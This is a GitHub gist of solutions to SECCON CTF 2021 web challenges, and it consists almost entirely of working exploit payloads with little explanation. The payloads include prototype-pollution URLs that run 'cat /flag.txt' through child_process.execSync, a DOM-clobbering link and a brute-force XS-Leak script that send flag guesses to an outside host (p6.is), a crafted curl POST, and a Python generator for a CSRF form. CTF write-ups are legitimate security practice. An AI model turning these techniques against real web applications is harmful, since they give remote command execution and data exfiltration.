Skip to content

Instantly share code, notes, and snippets.

@po6ix
Last active December 12, 2021 14:34
Show Gist options
  • Save po6ix/b3101d07d55a4506777f940eb5a2ad48 to your computer and use it in GitHub Desktop.
Save po6ix/b3101d07d55a4506777f940eb5a2ad48 to your computer and use it in GitHub Desktop.
SECCON CTF 2021

SECCON CTF 2021 Solutions

http://web:3000/?window=parentNode&?window=parentNode&view=%3Cform+id=parentNode+name=parentNode%3E%3Cinput+id=parentNode%3E%3C/form%3E%3Ca+id=parentNode+name=location+href=%22http://p6.is:1234?%22%3E%3C/a%3E%3Cx%20i=%22
http://sequence-as-a-service-1.quals.seccon.jp:3000/api/getValue?sequence=(a)%3D%3E(a(%22%2C%22%2Ca(%22set%22%2C%20a(%22self%22)%2C%20%22__proto__%22%2C%20(f)%3D%3E(1))%2Ca(%22constructor%22%2C%20%22return+process.mainModule.require('child_process').execSync('cat+/flag.txt')%2b[]%22)()))&n=1
http://sequence-as-a-service-2.quals.seccon.jp:3000/api/getValue?sequence0=(a%2Cb%2Cc)%3D%3E(a(%22%2C%22%2Ca(%22set%22%2Ca(%22set%22%2C%7B%7D%2C%22__proto__%22%2Cundefined)%2C%22x%22%2C193886)%2Ca))%0A&n0=1&sequence1=(a%2Cb%2Cc)%3D%3E(a(%22%2C%22%2Ca%2Cx(%22require(%27child_process%27).execSync(%27cat+/flag.txt%27)%2B%5B%5D%22)))&n1=1
curl https://vulnerabilities.quals.seccon.jp/api/vulnerability -X POST --data '{"Name":"b","name":"","id":14}'
<script>

window.open('/10.html');
var win;
var q = new URLSearchParams(location.search).get('q');

//query = 'R';
chars = '0123456789abcdefghijklmnopqrstuvwxyz}_';


const exp = (i) => {
  if (i >= chars.length) {
    return;
  }

  c = chars[i];
  query = q + c;

  url = 'http://web:3000/?search=' + query + '&msg[]=<meta name="referrer" content="unsafe-url"><meta http-equiv=refresh content="0; url=http://p6.is/?answer=' + query + '">'
  win = window.open(url);

  setTimeout(() => exp(i + 1), 500);
};
setTimeout(() => exp(0), 1000);

</script>
from itertools import product

li = '0123456789abcdefghijklmnopqrstuvwxyz_}'

print('<form action="http://web:3000/createNote" method="POST" name="frm">')
count = 0
for comb in product(li, repeat = 1):
    print('<input name="note[]" value="SECCON{m4rqu3e_1s_my_l1fe_b'+''.join(comb)+'">')
    count += 1

print(
'''<input name="note[toString]" value=".....">
<input type="submit">
</form>
<script>
frm.submit()
</script>''')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment